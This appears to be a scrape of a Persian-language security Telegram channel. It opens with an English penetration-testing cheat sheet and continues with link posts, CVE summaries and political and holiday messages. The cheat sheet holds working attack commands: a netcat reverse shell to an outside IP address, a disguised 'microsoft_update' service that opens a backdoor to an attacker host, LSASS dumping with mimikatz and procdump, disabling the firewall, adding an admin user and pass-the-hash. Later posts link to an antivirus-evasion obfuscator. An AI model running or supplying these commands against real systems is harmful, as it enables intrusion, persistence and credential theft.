🧪 WEB PENSTING 🧪

Nmap Full Web Vulnerable Scan

cd /usr/share/nmap/noscripts/
wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz
nmap -sS -sV --noscript=vulscan/vulscan.nse target
nmap -sS -sV --noscript=vulscan/vulscan.nse –noscript-args vulscandb=scipvuldb.csv target
nmap -sS -sV --noscript=vulscan/vulscan.nse –noscript-args vulscandb=scipvuldb.csv -p80 target
nmap -PN -sS -sV --noscript=vulscan –noscript-args vulscancorrelation=1 -p80 target
nmap -sV --noscript=vuln target
nmap -PN -sS -sV --noscript=all –noscript-args vulscancorrelation=1 target


Dirb Dir Bruteforce:

dirb http://IP:PORT /usr/share/dirb/wordlists/common.txt

Nikto web server scanner

nikto -C all -h http://IP

WordPress Scanner

git clone https://github.com/wpscanteam/wpscan.git && cd wpscan
./wpscan –url http://IP/ –enumerate p

HTTP Fingerprinting

wget http://www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip
cd httprint_301/linux/
./httprint -h http://IP -s signatures.txt

SKIP Fish Scanner

skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http://IP

Nmap Ports Scan

nmap -sS -sV -D IP1,IP2,IP3,IP4,IP5 -f –mtu=24 –data-length=1337 -T2 target ( Randomize scan form diff IP)
nmap -Pn -T2 -sV –randomize-hosts IP1,IP2
nmap –noscript smb-check-vulns.nse -p445 target (using NSE noscripts)
nmap -sU -P0 -T Aggressive -p123 target (Aggresive Scan T1-T5)
nmap -sA -PN -sN target
nmap -sS -sV -T5 -F -A -O target (version detection)
nmap -sU -v target (Udp)
nmap -sU -P0 (Udp)
nmap -sC 192.168.31.10-12 (all scan default)

NC Scanning

nc -v -w 1 target -z 1-1000
for i in {101..102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done

Unicornscan

us -H -msf -Iv 192.168.56.101 -p 1-65535
us -H -mU -Iv 192.168.56.101 -p 1-65535

-H resolve hostnames during the reporting phase
-m scan mode (sf - tcp, U - udp)
-Iv - verbose

Xprobe2 OS fingerprinting

xprobe2 -v -p tcp:80:open IP

Samba Enumeration

nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target

SNMP Enumeration

snmpget -v 1 -c public IP
snmpwalk -v 1 -c public IP
snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP

Windows Useful cmds

net localgroup Users
net localgroup Administrators
search dir/s *.doc
system("start cmd.exe /k $cmd")
sc create microsoft_update binpath="cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore
/c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp For 32 bits
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp For 64 bits

PuTTY Link tunnel

Forward remote port to local address
plink.exe -P 22 -l root -pw "1234" -R 445:127.0.0.1:445 IP

Meterpreter portfwd

# https://www.offensive-security.com/metasploit-unleashed/portfwd/
# forward remote port to local address
meterpreter > portfwd add –l 3389 –p 3389 –r 172.16.194.141
kali > rdesktop 127.0.0.1:3389

Enable RDP Access

reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable

Turn Off Windows Firewall

netsh firewall set opmode disable

Meterpreter VNC\RDP

run getgui -u admin -p 1234
run vnc -p 5043

Add New user in Windows

net user test 1234 /add
net localgroup administrators test /add

Mimikatz use

git clone https://github.com/gentilkiwi/mimikatz.git
privilege::debug
sekurlsa::logonPasswords full

Passing the Hash

git clone https://github.com/byt3bl33d3r/pth-toolkit
pth-winexe -U hash //IP cmd

or

apt-get install freerdp-x11
xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP

#Web #Pentest
@PfkSecurity

❤️‍🔥 امیرعماد میرمیرانی(جادی) فعال حوزه تکنولوژی، که دو ماه پیش بازداشت شده بود با قید وثیقه آزاد شد.

به امید آزادی تمامی زندانیان سیاسی
@pfksecurity

AWESOME Azure Policy.

https://github.com/globalbao/awesome-azure-policy

#Azure
@PfkSecurity

#exploit
ابزارهای اکسپلویت رایج
https://github.com/clearcdq/Common-tools

@PfkSecurity

Powershell anti-kill obfuscator, simple and effective. A simple and effective powershell obfuscaiton tool bypass Anti-Virus
https://github.com/H4de5-7/powershell-obfuscation

@pfksecurity

CVE-2022-27775
آسیب‌پذیری افشای اطلاعات در curl 7.65.0 تا 7.82.0 آسیب‌پذیر است که با استفاده از یک آدرس IPv6 که در مخزن اتصال بود اما با شناسه اسکوپ متفاوت، می‌توان از اتصال مجدد استفاده کرد.
#cve
@pfksecurity

شب چله شاد باد

@pfksecurity

CVE-2022-3481
افزونه WooCommerce Dropshipping وردپرس قبل از نسخه 4.4 قبل از استفاده از آن در یک دستور SQL از طریق یک نقطه پایانی REST در دسترس کاربران احراز هویت نشده، به درستی پاکسازی نمی‌کند و از یک پارامتر فرار نمی‌کند و منجر به تزریق SQL می‌شود.
#CVE
@pfksecurity

۳۰  میلیارد دلار پول بلوکه شده ایران در چین وجود داشت که به ما باز نمی‌گرداند؛ برای زنده شدن این پول توافق شد که پکن از پول خودمان به خودمان وام دهد
به شرط آن‌ که چین نیز یک طرف از پروژه سد باشد.
مدیر مطالعات سد چشمیر

استعمار و تحقیر شرقی ظاهراً از توافق با غرب، منافع بیشتری دارد. البته منافع مردمی نه!

گرچه در غم انگیز ترین یلدای روزگاریم اما فراموش نکنیم که در روزهای حمله اعراب،در سال های خونین مغول،در قحطی جنگ جهانی و زیر موشک باران دهه شصت «یلدا» و«نوروز»ما را از بزنگاه های تاریخی مان عبور دادند و ماندند و ماندیم....پس در این زخمازخم روزگار یلدا را فراموش نمی کنیم.گرچه بهانه ای برای شادباش نیست اما نگذاریم دلشوره ها و دلمردگی ها و دلنگرانی ها یلدا را از یادمان ببرد.شاید رخت های سیاه و  سفره های خالی نسبتی با سرخی انار و هندوانه نداشته باشند  اما یک چای قند پهلو و چند بیتی حافظ و یاد آنهایی که کنارمان نیستند یلدا را در این تلخی تاریخ همچنان زنده نگه می دارد که «ایران»زنده بماند و می ماند.
بلندترین شب سال شب چله بر همگی پارسیان و پارسی زبان جهان مبارک باد

شب اورمزد آمد از ماه دی
ز گفتن بیاسای و بردار می

                             فردوسی بزرگ

امسال همه در شب چله شاهنامه می‌خوانیم به فرزندان خود فردوسی فرزانه را بیشتر می‌شناسانیم .

خرد، اگاهی، آزادی ، همبستگی و همدلی، شادی و مهر .‌‌...
همه و همه از پایه‌های فرهنگ ایران کهن هست که دوباره باید زنده شود.
شب چله ، شب پیروزی روشنایی بر تاریکی ، اَشا بر دروج است
جشن زیبای چله، زایش مهر بر افق ایران اهورایی مان خجسته باد
@pfksecurity

در هر مکالمه ای و حتی بیشتر از آن در مهندسی اجتماعی، پرسیدن سؤالات درست در حین دنبال کردن یک هدف مهم است. هر دو بخش مقاله به موضوع سؤالات اختصاص داده می شود، تئوری را در نظر می گیریم و نمونه های خاصی نیز وجود خواهد داشت. نامه های زیادی. اما در عین حال، بدون آب، فقط نظریه جالب و عمل مهم است. خواندن این مقاله را توصیه می کنم .

خواندن
#SE
@PFKSecurity
@PFK_Security

ژاک لاکان می‌گفت: «کتاب‌خواندن، آگاهی را تضمین نمی‌کند ولی برای آگاهی باید اول کتاب خواند» و همین را با جرح و تعدیل در پاسخ به دوستم که پرسید «یعنی همهٔ مسائل حل می‌شه با رفتنِ این‌ها؟» دادم: با رفتنِ این‌ها، همهٔ مسائل حل نمی‌شود ولی برای حل شدن مسائل، باید اول این‌ها بروند.

@pfksecurity

اصول اولیه برای ایجاد قوانین Yara

https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/101/Yara.md

@PfkSecurity

11 مشکلی که ChatGPT می تواند برای مهندسان معکوس و تحلیلگران بدافزار حل کند.

https://www.sentinelone.com/labs/11-problems-chatgpt-can-solve-for-reverse-engineers-and-malware-analysts/

#RE
@pfksecurity

10 بحث برتر SANS Summits در سال 2022

https://www.sans.org/blog/top-sans-summits-talks-2022/
#Sans
@pfksecurity

🔖 یادداشت. آزمایشگاه های هک اخلاقی

این مجموعه ای از آموزش ها و آزمایشگاه های ساخته شده برای دانش آموزان هک اخلاقی، دانشجویان امنیت سایبری، شبکه و ادمین های سیستم است.

• امروز قصد دارم مجموعه مفیدی از آموزش ها و آزمایشگاه هایی که برای آموزش اصول هک و امنیت سایبری ایجاد و طراحی شده اند را با شما به اشتراک بگذارم.

🧷 https://github.com/Samsar4/Ethical-Hacking-Labs

@P.F.K

تاریخ هرگز هیچ جامعه‌ای که توانسته باشد تحت تسلط روحانیون یک دولت آزاد و متمدن را تشکیل بدهد معرفی نکرده است ...!!

#فرانسوا_ولتر‌

@pfksecurity